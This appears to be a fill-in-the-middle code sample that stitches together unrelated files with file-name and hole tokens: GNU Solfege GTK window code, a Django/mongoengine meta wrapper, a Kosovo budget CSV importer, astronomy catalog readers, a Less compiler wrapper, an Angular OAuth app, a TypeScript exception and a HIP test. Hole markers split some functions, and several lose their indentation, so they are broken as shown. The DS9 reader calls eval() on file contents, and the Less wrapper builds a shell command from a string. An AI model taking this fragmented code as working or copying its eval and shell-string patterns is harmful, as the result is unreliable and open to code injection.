            [frontpage.Column(
                [frontpage.LinkList(_('Recent exercises'),
                    solfege.db.recent(8))])])
        self.display_frontpage(data, show_topics=True)
        # The search box makes no sense for this generated page.
        self.get_view().g_searchbox.hide()
    def display_recent_tests(self, w):
        """Show a test page listing the 8 most recently run tests."""
        data = frontpage.Page(_('Recent tests'),
            [frontpage.Column(
                [frontpage.LinkList(_('Recent tests'),
                    solfege.db.recent_tests(8))])])
        self.display_testpage(data, show_topics=True)
        # The search box makes no sense for this generated page.
        self.get_view().g_searchbox.hide()
    def display_testpage(self, data=None, show_topics=False):
        """
        Display the tests page. When 'data' is None, show the page built
        from solfege.app.m_frontpage_data.
        """
        self.set_title("GNU Solfege - tests")
        # Create the tests view lazily on first use.
        if not self.show_view('testspage'):
            p = TestsView()
            p.connect('link-clicked', self.history_handler)
            self.add_view(p, 'testspage')
        self.get_view().g_searchbox.show()
        if not data:
            data = solfege.app.m_frontpage_data
        self.trim_history(self.get_view(), data)
        self.get_view().display_data(data, show_topics=show_topics)
    def on_search_all_exercises(self, widget=None):
        """Show the global search view, creating it on first use."""
        self.set_title("GNU Solfege")
        if not self.show_view('searchview'):
            self.add_view(SearchView(_('Search the exercise titles of all lesson files found by the program, not just the active front page with sub pages.')), 'searchview')
    def display_frontpage(self, data=None, show_topics=False):
        """
        Display the front page. When 'data' is None, show the page built
        from solfege.app.m_frontpage_data.
        """
        # Include the active profile name in the title, if one is selected.
        if solfege.app.m_options.profile:
            self.set_title("GNU Solfege - %s" % solfege.app.m_options.profile)
        else:
            self.set_title("GNU Solfege")
        # Create the front page view lazily on first use.
        if not self.show_view('frontpage'):
            p = FrontPage()
            p.connect('link-clicked', self.history_handler)
            self.add_view(p, 'frontpage')
        self.get_view().g_searchbox.show()
        if not data:
            data = solfege.app.m_frontpage_data
        self.trim_history(self.get_view(), data)
        self.get_view().display_data(data, show_topics=show_topics)
    def trim_history(self, new_viewer, new_page):
        """Truncate m_history so that navigating to (new_viewer, new_page)
        does not leave stale forward entries behind.
        """
        # First check if the page we want to display is in m_history.
        # If so, we will truncate history after it.
        for i, (viewer, page) in enumerate(self.m_history):
            if (new_viewer != viewer) or (new_page == page):
                self.m_history = self.m_history[:i]
                break
    def history_handler(self, *w):
        # Signal handler for 'link-clicked': record (viewer, page) in history.
        self.m_history.append(w)
    def initialise_exercise(self, teacher):
        """
        Create a Gui object for the exercise and add it to
        the box_dict dict. The exercise must not already be registered.
        """
        assert teacher.m_exname not in self.box_dict
        self.get_view().hide()
        m = solfege.app.import_module(teacher.m_exname)
        self.add_view(m.Gui(teacher), teacher.m_exname)
def on_key_press_event(self, widget, event):
try:
view = self.get_view()
except KeyError:<|fim▁hole|> return
if (event.type == Gdk.EventType.KEY_PRESS
and event.get_state() & Gdk.ModifierType.MOD1_MASK == Gdk.ModifierType.MOD1_MASK# Alt key
and event.keyval in (Gdk.KEY_KP_Left, Gdk.KEY_Left)
and self.m_history
and not solfege.app.m_test_mode):
obj, page = self.m_history[-1]
self.trim_history(obj, page)
# Find the box_dict key for obj
for k, o in self.box_dict.items():
if o == obj:
obj.display_data(page)
self.show_view(k)
break
return True
view.on_key_press_event(widget, event)
    def open_profile_manager(self, widget=None):
        """Run the profile chooser dialog and switch the app, the statistics
        database and the saved config over to the selected profile.
        """
        p = ChangeProfileDialog(solfege.app.m_options.profile)
        if p.run() == Gtk.ResponseType.ACCEPT:
            prof = p.get_profile()
        else:
            # The user presses cancel. This will use the same profile as
            # before, but if the user has renamed the active profile, then
            # we need to use the new name.
            prof = p.m_default_profile
        solfege.app.reset_exercise()
        solfege.app.m_options.profile = prof
        # Commit and close the old profile's database before reopening.
        solfege.db.conn.commit()
        solfege.db.conn.close()
        solfege.db = statistics.DB(None, profile=prof)
        cfg.set_string("app/last_profile", prof)
        self.display_frontpage()
        p.destroy()
    def open_preferences_window(self, widget=None):
        """Show the preferences window, creating it on first use and
        refreshing its statistics info on later invocations.
        """
        if not self.g_config_window:
            self.g_config_window = ConfigWindow()
            self.g_config_window.show()
        else:
            self.g_config_window.update_old_statistics_info()
            self.g_config_window.update_statistics_info()
            self.g_config_window.show()
    def quit_program(self, *w):
        """Close all open editor dialogs and quit. Returns True (stopping the
        delete-event) when an editor refuses to close, aborting the quit.
        """
        can_quit = True
        for dlg in gu.EditorDialogBase.instance_dict.values():
            if dlg.close_window():
                dlg.destroy()
            else:
                # The dialog refused to close (e.g. unsaved changes).
                can_quit = False
                break
        if can_quit:
            solfege.app.quit_program()
            Gtk.main_quit()
        else:
            return True
    def display_in_musicviewer(self, music):
        """Show 'music' in the music viewer window, creating it on first use."""
        if not self.g_musicviewer_window:
            self.g_musicviewer_window = MusicViewerWindow()
            self.g_musicviewer_window.show()
        self.g_musicviewer_window.display_music(music)
    def close_musicviewer(self, widget=None):
        """Destroy the music viewer window and forget the reference."""
        self.g_musicviewer_window.destroy()
        self.g_musicviewer_window = None
def enter_test_mode(self):
if 'enter_test_mode' not in dir(self.get_view()):
gu.dialog_ok(_("The '%s' exercise module does not support test yet." % self.m_viewer))
return
self.m_action_groups['NotExit'].set_sensitive(False)
self.g = self.get_view().g_notebook.get_nth_page(0)
self.get_view().g_notebook.get_nth_page(0).reparent(self.main_box)
self.get_view().g_notebook.hide()
self.get_view().enter_test_mode()
    def exit_test_mode(self):
        """Undo enter_test_mode: put the practise page back as the first
        notebook page and show the notebook again.
        """
        solfege.app.m_test_mode = False
        self.m_action_groups['NotExit'].set_sensitive(True)
        box = Gtk.VBox()
        self.get_view().g_notebook.insert_page(box, Gtk.Label(label=_("Practise")), 0)
        # self.g holds the practise page saved by enter_test_mode.
        self.g.reparent(box)
        self.get_view().g_notebook.show()
        self.get_view().g_notebook.get_nth_page(0).show()
        self.get_view().g_notebook.set_current_page(0)
        self.get_view().exit_test_mode()
    def new_training_set_editor(self, widget):
        """Open a new training set editor dialog."""
        dlg = TrainingSetDialog()
        dlg.show_all()
    def new_practisesheet_editor(self, widget):
        """Open a new practise sheet editor dialog."""
        dlg = PractiseSheetDialog()
        dlg.show_all()
<|file_name|>document_options.py<|end_file_name|><|fim▁begin|>import sys
import warnings
from django.db.models.fields import FieldDoesNotExist
from django.utils.text import capfirst
from django.utils.encoding import smart_text
try:
from django.db.models.options import get_verbose_name
except ImportError:
from django.utils.text import camel_case_to_spaces as get_verbose_name
from mongoengine.fields import ReferenceField
class PkWrapper(object):
    """Wraps the mongoengine primary-key field so it can mimic the
    attributes Django expects on a model's pk field.

    Attribute reads fall through to the wrapped field; attribute writes
    are mirrored onto the wrapped field (when it has the attribute) and
    always stored on the wrapper itself.
    """
    editable = False
    remote_field = None
    def __init__(self, wrapped):
        self.obj = wrapped
    def __getattr__(self, attr):
        # Only invoked when normal lookup on the wrapper fails.
        if attr not in dir(self.obj):
            raise AttributeError("{} has no {}".format(self, attr))
        return getattr(self.obj, attr)
    def __setattr__(self, attr, value):
        # 'obj' must be checked first: during __init__ the wrapped object
        # does not exist yet, and the short-circuit avoids recursion.
        if attr != 'obj' and hasattr(self.obj, attr):
            setattr(self.obj, attr, value)
        super(PkWrapper, self).__setattr__(attr, value)
    def value_to_string(self, obj):
        """
        Returns a string value of this field from the passed obj.
        This is used by the serialization framework.
        """
        return smart_text(obj.pk)
class DocumentMetaWrapper(object):
"""
Used to store mongoengine's _meta dict to make the document admin
as compatible as possible to django's meta class on models.
"""
_pk = None
pk_name = None
app_label = None
model_name = None
verbose_name = None
has_auto_field = False
object_name = None
proxy = []
virtual_fields = []
concrete_fields = []
proxied_children = []
parents = {}
many_to_many = []
swapped = False
_field_cache = None
document = None
_meta = None
    def __init__(self, document):
        """Wrap 'document' (a mongoengine Document class or instance) and
        expose Django-Options-like attributes derived from its _meta dict.
        """
        # Unwrap if the document was already wrapped once.
        if isinstance(document._meta, DocumentMetaWrapper):
            meta = document._meta._meta
        else:
            meta = document._meta
        self.document = document
        self._meta = meta or {}
        self.model = document
        self.concrete_model = document
        self.concrete_fields = document._fields.values()
        self.fields = self.concrete_fields
        # 'document' may be a class (has __name__) or an instance.
        try:
            self.object_name = self.document.__name__
        except AttributeError:
            self.object_name = self.document.__class__.__name__
        self.model_name = self.object_name.lower()
        self.app_label = self.get_app_label()
        self.verbose_name = self.get_verbose_name()
        # EmbeddedDocuments don't have an id field.
        try:
            self.pk_name = self._meta['id_field']
            self._init_pk()
        except KeyError:
            pass
    @property
    def module_name(self):
        """
        This property has been deprecated in favor of `model_name`.
        """
        warnings.warn(
            "Options.module_name has been deprecated in favor of model_name",
            PendingDeprecationWarning, stacklevel=2)
        return self.model_name
    def get_app_label(self):
        """Derive the app label from the document's module path: the
        second-to-last dotted component (e.g. 'myapp' for 'myapp.models').
        """
        model_module = sys.modules[self.document.__module__]
        return model_module.__name__.split('.')[-2]
    def get_verbose_name(self):
        """
        Returns the verbose name of the document.

        Checks the original meta dict first. If it is not found
        then generates a verbose name from the object name.
        """
        try:
            return capfirst(get_verbose_name(self._meta['verbose_name']))
        except KeyError:
            return capfirst(get_verbose_name(self.object_name))
    @property
    def verbose_name_raw(self):
        # Django exposes the untranslated name here; we have no translation
        # layer, so it is the same as verbose_name.
        return self.verbose_name
    @property
    def verbose_name_plural(self):
        # Naive pluralization (appends 's'); a 'verbose_name_plural' entry
        # in _meta is NOT consulted here.
        return "%ss" % self.verbose_name
    @property
    def pk(self):
        # Lazily (re)build the pk wrapper if it is missing or incomplete.
        if not hasattr(self._pk, 'attname'):
            self._init_pk()
        return self._pk
    def get_fields(self, include_parents=True, include_hidden=False):
        # XXX: simple placeholder; TODO: handle options;
        # Both flags are currently ignored.
        return self.concrete_fields
    def _init_pk(self):
        """
        Adds a wrapper around the document's pk field. The wrapper object gets
        the attributes django expects on the pk field, like name and attname.
        """
        if self.id_field is None:
            return
        try:
            pk_field = getattr(self.document, self.id_field)
            self._pk = PkWrapper(pk_field)
            self._pk.name = self.id_field
            self._pk.attname = self.id_field
        except AttributeError:
            # Document has no attribute for its declared id field; leave
            # self._pk unset.
            return
    def get_add_permission(self):
        # Django-style permission codename, e.g. 'add_article'.
        return 'add_%s' % self.object_name.lower()
    def get_change_permission(self):
        # Django-style permission codename, e.g. 'change_article'.
        return 'change_%s' % self.object_name.lower()
    def get_delete_permission(self):
        # Django-style permission codename, e.g. 'delete_article'.
        return 'delete_%s' % self.object_name.lower()
    def get_ordered_objects(self):
        # No ordering support for documents; always empty.
        return []
    def get_field_by_name(self, name):
        """
        Returns the (field_object, model, direct, m2m), where field_object is
        the Field instance for the given name, model is the model containing
        this field (None for local fields), direct is True if the field exists
        on this model, and m2m is True for many-to-many relations. When
        'direct' is False, 'field_object' is the corresponding RelatedObject
        for this field (since the field doesn't have an instance associated
        with it).

        Uses a cache internally, so after the first access, this is very fast.
        """
        try:
            try:
                return self._field_cache[name]
            except TypeError:
                # Cache not built yet (self._field_cache is None).
                self._init_field_cache()
                return self._field_cache[name]
        except KeyError:
            raise FieldDoesNotExist('%s has no field named %r'
                    % (self.object_name, name))
    def _init_field_cache(self):
        """Build the name -> (field, model, direct, m2m) cache on first call.
        NOTE(review): returns the cache only when it was just built; callers
        read self._field_cache directly, so the return value is incidental.
        """
        if self._field_cache is None:
            self._field_cache = {}
            for f in self.document._fields.values():
                if isinstance(f, ReferenceField):
                    # Reference fields are keyed by the referenced document's
                    # module name and marked as indirect.
                    document = f.document_type
                    self._field_cache[document._meta.module_name] = (f, document, False, False)
                else:
                    self._field_cache[f.name] = (f, None, True, False)
            return self._field_cache
    def get_field(self, name, many_to_many=True):
        """
        Returns the requested field by name. Raises FieldDoesNotExist on error.
        The 'many_to_many' flag is accepted for API compatibility and ignored.
        """
        return self.get_field_by_name(name)[0]
    def __getattr__(self, name):
        # Unknown attributes fall through to the underlying _meta dict.
        try:
            return self._meta[name]
        except KeyError as e:
            raise AttributeError(*e.args)
    def __setattr__(self, name, value):
        # Attributes not already present on the wrapper are stored in the
        # underlying _meta dict; existing ones are set normally.
        if not hasattr(self, name):
            self._meta[name] = value
        else:
            super(DocumentMetaWrapper, self).__setattr__(name, value)
    def __getitem__(self, key):
        # Dict-style read access to the underlying _meta dict.
        return self._meta[key]
def __setitem__(self, key, value):<|fim▁hole|> return key in self._meta
    def get(self, key, default=None):
        """Dict-style get() against the underlying _meta dict."""
        try:
            return self.__getitem__(key)
        except KeyError:
            return default
    def get_parent_list(self):
        # Documents have no model inheritance chain to report.
        return []
    def get_all_related_objects(self, *args, **kwargs):
        # Reverse relations are not tracked; always empty.
        return []
    def iteritems(self):
        # Python 2 iterator view over the underlying _meta dict.
        return self._meta.iteritems()
    def items(self):
        # Items of the underlying _meta dict.
        return self._meta.items()
def __contains__(self, key): |
<|file_name|>kosovo_importer.py<|end_file_name|><|fim▁begin|>from abstract_importer import AbstractImporter
from slugify import slugify
class KosovoImporter(AbstractImporter):
<|fim▁hole|> pass
    def get_csv_filename(self):
        # Path (relative to the project root) of the source CSV file.
        return "importer/data/kosovo/kosovo-budget-expenditures-2014.csv"
    def get_region(self):
        # Human-readable region name stored on every imported document.
        return 'Kosovo'
    def get_dataset(self):
        # Human-readable dataset name stored on every imported document.
        return 'Budget Expenditure (2014)'
    def build_docs(self, row):
        """Build the document(s) for one CSV row.

        Expected row layout: [activity type, description, cost, year].
        Returns a single-element list with the document dict.
        """
        # Column 3 holds the year for this expenditure row.
        year = row[3]
        # Clean expense string so that it is numerical (e.g. turn blank string to 0).
        cost = row[2].replace(',', '')
        if not cost.strip():
            cost = 0
        # Create doc.
        doc = {
            'region': {
                'name': self.get_region(),
                'slug': slugify(self.get_region(), to_lower=True)
            },
            'dataset': {
                'name': self.get_dataset(),
                'slug': slugify(self.get_dataset(), to_lower=True)
            },
            'activity': {
                'type': row[0],
                'description': row[1]
            },
            'cost': float(cost),
            'year': int(year)
        }
        # Console output to provide user with feedback on status of importing process.
        print '%s - %s: %s (%s %i)' % (doc['activity']['type'], doc['activity']['description'], doc['cost'], doc['region']['name'], doc['year'])
        return [doc]
<|file_name|>ascii.py<|end_file_name|><|fim▁begin|>"""Module to read/write ascii catalog files (CSV and DS9)"""
##@package catalogs
##@file ascii_data<|fim▁hole|>The following functions are meant to help in reading and writing text CSV catalogs
as well as DS9 region files. Main structure used is dictionaries do deal with catalog
data in a proper way.
"""
import sys
import logging
import csv
import re
import string
# ---
def dict_to_csv(columns, fieldnames=None, filename='cat.csv', mode='w', delimiter=','):
    """
    Write a CSV catalog from given dictionary contents.

    Each entry of 'fieldnames' is expected to be a key of 'columns'; the
    associated value (a list) is written as one csv column. Scalar values
    are promoted to single-element lists, and columns shorter than the
    longest one are padded by cycling their own values so every column has
    the same number of rows.

    Input:
     - columns {str:[]} : Contents to be written to the csv catalog
     - fieldnames [str] : Keys of 'columns' to write (default: all keys)
     - filename str     : Name of csv catalog to write
     - mode str         : Write a new catalog, 'w', or append to an existing one, 'a'.
     - delimiter str    : Delimiter to use between columns in 'filename'

    Output:
     * If no error messages are returned, a file 'filename' is created.

    ---
    """
    if not fieldnames:
        fieldnames = list(columns.keys())
    # Work on copies so the caller's lists are never mutated, and promote
    # scalars to single-element lists. (The old code extended the caller's
    # own lists through a shallow copy.)
    table = {}
    for k in fieldnames:
        val = columns[k]
        if not isinstance(val, (list, tuple)):
            val = [val]
        table[k] = list(val)
    logging.debug("Fields being written to (csv) catalog: %s", fieldnames)
    max_leng = max(len(table[k]) for k in fieldnames)
    # Pad shorter (non-empty) columns by cycling their own values up to
    # exactly 'max_leng' entries.
    for k in fieldnames:
        col = table[k]
        if col and len(col) < max_leng:
            col.extend((col * max_leng)[:max_leng - len(col)])
    catFile = open(filename, mode)
    try:
        catObj = csv.writer(catFile, delimiter=delimiter)
        catObj.writerow(fieldnames)
        # zip truncates to the shortest column, i.e. to max_leng rows
        # (or to zero rows when some column was empty).
        for _row in zip(*[table[k] for k in fieldnames]):
            catObj.writerow(_row)
    finally:
        catFile.close()
    return
# ---
def dict_from_csv(filename, fieldnames, header_lines=1, delimiter=',', dialect='excel'):
    """
    Read CSV catalog and return a dictionary with the contents

    dict_from_csv( filename, fieldnames, ...) -> {}

    To each column data read from 'filename' is given the respective
    'fieldnames' entry. (So it is expected that len(fieldnames) matches the
    number of columns in 'filename'.)

    It is expected that the first lines of the CSV file are header lines
    (comments). The amount of header lines to skip is given through
    'header_lines'. 'delimiter' specifies the field separator and 'dialect'
    is the CSV pattern used.

    Input:
     - filename str     : Name of csv catalog to read
     - fieldnames [str] : Fieldnames to be read from catalog
     - header_lines int : Number of lines to skip at the head of 'filename'
     - delimiter str    : Delimiter to use between columns in 'filename'
     - dialect str      : CSV file fine structure (See help(csv) for more info)

    Output:
     - {*fieldnames}

    ---
    """
    # Initialize output dictionary
    Dout = {}
    for k in fieldnames:
        Dout[k] = []
    catFile = open(filename, 'r')
    try:
        # Skip the header/comment lines at the top of the file.
        # next() (instead of the Python2-only file.next()) works on both
        # Python 2.6+ and Python 3.
        for _ in range(header_lines):
            next(catFile)
        catObj = csv.DictReader(catFile, fieldnames, delimiter=delimiter, dialect=dialect)
        for row in catObj:
            for k in fieldnames:
                Dout[k].append(row[k])
    finally:
        # The old code leaked the file handle; always close it.
        catFile.close()
    return Dout
# ---
def write_ds9cat(x, y, size=20, marker='circle', color='red', outputfile='ds9.reg', filename='None'):
    """
    Function to write a ds9 region file given a set of centroids.

    Supported markers are 'circle' and 'box'. 'size', 'marker' and 'color'
    may be scalars (applied to every centroid) or lists; lists shorter than
    the number of centroids are padded by repeating their last element.

    Input:
     - x : int | []
        X-axis points
     - y : int | []
        Y-axis points
     - size : int | []
        Region size(s) (circle radius, box side)
     - marker : str | [str]
        'circle' or 'box'
     - color : str | [str]
        Region color(s)
     - outputfile : str
        Name of the region file to write
     - filename : str
        Value written on the "# Filename:" header line

    Output:
     * Writes 'outputfile'; returns False when x and y lengths differ.

    """
    try:
        if len(x) != len(y):
            sys.stderr.write("X and Y lengths do not match. Check their sizes.")
            return False
    except TypeError:
        # Scalars were given: promote both to single-element lists.
        x = [x]
        y = [y]
    length = len(x)
    def _pad(seq):
        """Pad a list with its last element so it has 'length' entries."""
        if len(seq) < length:
            seq.extend([seq[-1]] * (length - len(seq)))
        return seq
    # Normalize size/marker/color to lists of exactly 'length' entries.
    try:
        len(size)
    except TypeError:
        size = [size]
    size = _pad(list(size))
    if isinstance(marker, str):
        marker = [marker]
    marker = _pad(list(marker))
    if isinstance(color, str):
        color = [color]
    color = _pad(list(color))
    output = open(outputfile, 'w')
    try:
        # DS9 region file header
        output.write("# Region file format: DS9 version 4.1\n")
        output.write("# Filename: %s\n" % (filename))
        output.write("global color=green dashlist=8 3 width=1 font=\"helvetica 10 normal\" ")
        output.write("select=1 highlite=1 dash=0 fixed=0 edit=1 move=1 delete=1 include=1 source=1\n")
        output.write("image\n")
        for i in range(length):
            if marker[i] == 'circle':
                output.write("circle(%s,%s,%s) # color=%s\n" % (x[i], y[i], size[i], color[i]))
            elif marker[i] == 'box':
                output.write("box(%s,%s,%s,%s,0) # color=%s\n" % (x[i], y[i], size[i], size[i], color[i]))
    finally:
        output.close()
    return
# ---
def read_ds9cat(regionfile):
    """ Function to read a ds9 region file

    Only regions marked with a 'circle' or 'box' are read.
    The 'color' used for each region mark is returned together with
    'x','y','size','marker' as lists in a dictionary. The key 'filename'
    in the output gives the filename found in the 'regionfile' header.

    Input:
     - regionfile : ASCII (ds9 format) file

    Output:
    -> {'filename':str,'marker':[],'color':[],'x':[],'y':[],'size':[]}

    """
    D_out = {'filename': '', 'marker': [], 'color': [], 'x': [], 'y': [], 'size': []}
    fp = open(regionfile, 'r')
    for line in fp.readlines():
        if re.search("^#", line):
            # Header/comment line: only the "# Filename:" entry matters.
            if re.search("Filename", line):
                imagename = line.split("/")[-1]
                D_out['filename'] = re.sub("# Filename: ", "", imagename).rstrip('\n')
                continue
        else:
            # Remember the last color seen; the "global" line normally
            # defines it before any region line appears.
            try:
                _cl = re.search(r'(?<=color\=).*', line).group()
                color = _cl.split()[0]
            except AttributeError:
                pass
            if re.search("circle", line) or re.search("box", line):
                marker = line.split("(")[0]
            else:
                continue
            # Try the box syntax first: box(x,y,dx,dy,angle).
            try:
                _fg = re.sub(r"\)", "", re.search(r'(?<=box\().*\)', line).group())
                x, y, dx, dy = _fg.split(",")[:4]
                D_out['x'].append(eval(x))
                D_out['y'].append(eval(y))
                D_out['size'].append(max(eval(dx), eval(dy)))
                D_out['color'].append(color)
                D_out['marker'].append(marker)
                continue
            except AttributeError:
                pass
            # Then the circle syntax: circle(x,y,R).
            try:
                _fg = re.sub(r"\)", "", re.search(r'(?<=circle\().*\)', line).group())
                x, y, R = _fg.split(",")[:3]
                D_out['x'].append(eval(x))
                D_out['y'].append(eval(y))
                D_out['size'].append(eval(R))
                D_out['color'].append(color)
                D_out['marker'].append(marker)
                continue
            except AttributeError:
                pass
    fp.close()
    return D_out
# ---
if __name__ == "__main__":
import doctest;
doctest.testmod()<|fim▁end|> |
""" |
<|file_name|>less.py<|end_file_name|><|fim▁begin|>import os.path
from pipeline.conf import settings
from pipeline.compilers import SubProcessCompiler
class LessCompiler(SubProcessCompiler):
output_extension = 'css'
    def match_file(self, filename):
        # This compiler handles files with a .less extension.
        return filename.endswith('.less')
<|fim▁hole|> command = '%s %s %s' % (
settings.PIPELINE_LESS_BINARY,
settings.PIPELINE_LESS_ARGUMENTS,
path
)
cwd = os.path.dirname(path)
content = self.execute_command(command, cwd=cwd)
return content<|fim▁end|> | def compile_file(self, content, path): |
<|file_name|>app.js<|end_file_name|><|fim▁begin|>'use strict';
/**
* @ngdoc object
* @name activityApp
* @requires $routeProvider
* @requires activityControllers
* @requires ui.bootstrap
*
* @description
* Root app, which routes and specifies the partial html and controller depending on the url requested.
*
*/
var app = angular.module('activityApp',
    ['activityControllers', 'ngRoute', 'ui.bootstrap', 'ui.bootstrap.datetimepicker']).
    config(['$routeProvider',
        function ($routeProvider) {
            $routeProvider.
                // List all activities.
                when('/activity', {
                    templateUrl: '/partials/show_activities.html',
                    controller: 'ShowActivityCtrl'
                }).
                // Create a new activity.
                when('/activity/create', {
                    templateUrl: '/partials/create_activities.html',
                    controller: 'CreateActivityCtrl'
                }).
                // Detail view for one activity, addressed by its websafe key.
                when('/activity/detail/:websafeActivityKey', {
                    templateUrl: '/partials/activity_detail.html',
                    controller: 'ActivityDetailCtrl'
                }).
                // Current user's profile.
                when('/profile', {
                    templateUrl: '/partials/profile.html',
                    controller: 'MyProfileCtrl'
                }).
                // Static home page (no controller needed).
                when('/', {
                    templateUrl: '/partials/home.html'
                }).
                // Fall back to the home page for unknown routes.
                otherwise({
                    redirectTo: '/'
                });
        }]);
/**
* @ngdoc filter
* @name startFrom
*
* @description
* A filter that extracts an array from the specific index.
*
*/
app.filter('startFrom', function () {
    /**
     * Returns a shallow copy of the array starting at the given index
     * (used for client-side pagination with ng-repeat).
     *
     * @param {Array} data
     * @param {Integer} start
     * @returns {Array|*}
     */
    var filter = function (data, start) {
        return data.slice(start);
    }
    return filter;
});
/**
* @ngdoc constant
* @name HTTP_ERRORS
*
* @description
* Holds the constants that represent HTTP error codes.<|fim▁hole|> 'UNAUTHORIZED': 401
});
/**
* @ngdoc service
* @name oauth2Provider
*
* @description
* Service that holds the OAuth2 information shared across all the pages.
*
*/
app.factory('oauth2Provider', function ($modal) {
    var oauth2Provider = {
        // OAuth2 client id registered in the Google developer console.
        CLIENT_ID: '411586073540-cq6ialm9aojdtjts6f12bb68up7k04t1.apps.googleusercontent.com',
        SCOPES: 'https://www.googleapis.com/auth/userinfo.email profile',
        // Tracks whether the user currently has a valid session.
        signedIn: false
    };

    /**
     * Calls the OAuth2 authentication method; 'callback' receives the
     * auth result from the Google API client.
     */
    oauth2Provider.signIn = function (callback) {
        gapi.auth.signIn({
            'clientid': oauth2Provider.CLIENT_ID,
            'cookiepolicy': 'single_host_origin',
            'accesstype': 'online',
            'approveprompt': 'auto',
            'scope': oauth2Provider.SCOPES,
            'callback': callback
        });
    };

    /**
     * Logs out the user.
     */
    oauth2Provider.signOut = function () {
        gapi.auth.signOut();
        // Explicitly set the invalid access token in order to make the API calls fail.
        gapi.auth.setToken({access_token: ''});
        oauth2Provider.signedIn = false;
    };

    /**
     * Shows the modal with Google+ sign in button.
     *
     * @returns {*|Window} the modal instance
     */
    oauth2Provider.showLoginModal = function() {
        var modalInstance = $modal.open({
            templateUrl: '/partials/login.modal.html',
            controller: 'OAuth2LoginModalCtrl'
        });
        return modalInstance;
    };

    return oauth2Provider;
});
*/
app.constant('HTTP_ERRORS', { |
<|file_name|>TooManyRequestException.ts<|end_file_name|><|fim▁begin|>/// <reference path="../../../node.d.ts" />
export = TooManyRequestException;
import HttpServiceUnavailableException = require('../../errors/HttpServiceUnavailableException');
'use strict';
/**
* 要求を受け付けできません。リクエストの密度が高すぎます。
*/
class TooManyRequestException extends HttpServiceUnavailableException {
/**
* @constructor
* @public
* @param {number} status
* @param {string} code=null
* @param {string} message=""
*/<|fim▁hole|> constructor(status:number, code:string=null, message:string="") {
super(status, code, message == null || message == "" ? "要求を受け付けできません。リクエストの密度が高すぎます。" : message);
}
}<|fim▁end|> | |
<|file_name|>account.routing.ts<|end_file_name|><|fim▁begin|>import {Routes, RouterModule} from '@angular/router';
import {LoginPageComponent} from './components/login-page/login-page.component';
import {RegisterPageComponent} from './components/register-page/register-page.component';
const accountRoutes:Routes = [{
path: 'login',
component: LoginPageComponent
}, {
path: 'register',<|fim▁hole|><|fim▁end|> | component: RegisterPageComponent
}];
export const accountRouting = RouterModule.forChild(accountRoutes); |
<|file_name|>hipDeviceGetAttribute.cpp<|end_file_name|><|fim▁begin|>/*
Copyright (c) 2015 - 2021 Advanced Micro Devices, Inc. All rights reserved.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:<|fim▁hole|>The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
*/
#include <hip/hip_runtime_api.h>
#include "test_common.h"
int main() {
    int val;
    // Exercise hipDeviceGetAttribute with every combination of
    // valid/NULL output pointer, valid/negative device ordinal, and
    // valid/out-of-range attribute, printing the returned status each time.
    hipDeviceAttribute_t attr =
        hipDeviceAttributeMaxThreadsPerBlock;  ///< Maximum number of threads per block.
    HIP_PRINT_STATUS(hipDeviceGetAttribute(NULL, attr, 0));
    HIP_PRINT_STATUS(hipDeviceGetAttribute(&val, attr, 0));
    HIP_PRINT_STATUS(hipDeviceGetAttribute(NULL, attr, -1));
    HIP_PRINT_STATUS(hipDeviceGetAttribute(&val, attr, -1));
    // 91 is outside the defined attribute range: negative test.
    attr = hipDeviceAttribute_t(91);
    HIP_PRINT_STATUS(hipDeviceGetAttribute(NULL, attr, 0));
    HIP_PRINT_STATUS(hipDeviceGetAttribute(&val, attr, 0));
    HIP_PRINT_STATUS(hipDeviceGetAttribute(NULL, attr, -1));
    HIP_PRINT_STATUS(hipDeviceGetAttribute(&val, attr, -1));
}
<|file_name|>mainwindow_ui.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'src/ui/mainwindow.ui'
#
# Created: Fri Feb 15 16:08:54 2013
# by: PyQt4 UI code generator 4.9.3
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
_fromUtf8 = lambda s: s
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName(_fromUtf8("MainWindow"))
MainWindow.resize(1024, 768)
self.centralwidget = QtGui.QWidget(MainWindow)
self.centralwidget.setEnabled(True)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.centralwidget.sizePolicy().hasHeightForWidth())
self.centralwidget.setSizePolicy(sizePolicy)
self.centralwidget.setObjectName(_fromUtf8("centralwidget"))
self.verticalLayout = QtGui.QVBoxLayout(self.centralwidget)
self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
self.horizontalLayout_2 = QtGui.QHBoxLayout()
self.horizontalLayout_2.setObjectName(_fromUtf8("horizontalLayout_2"))
self.label_3 = QtGui.QLabel(self.centralwidget)
self.label_3.setMaximumSize(QtCore.QSize(200, 200))
self.label_3.setText(_fromUtf8(""))
self.label_3.setPixmap(QtGui.QPixmap(_fromUtf8(":/logo/pixmaps/logo.jpg")))
self.label_3.setScaledContents(True)
self.label_3.setObjectName(_fromUtf8("label_3"))
self.horizontalLayout_2.addWidget(self.label_3)
self.verticalLayout_2 = QtGui.QVBoxLayout()
self.verticalLayout_2.setObjectName(_fromUtf8("verticalLayout_2"))
self.label_2 = QtGui.QLabel(self.centralwidget)
font = QtGui.QFont()
font.setPointSize(20)
self.label_2.setFont(font)
self.label_2.setAlignment(QtCore.Qt.AlignCenter)
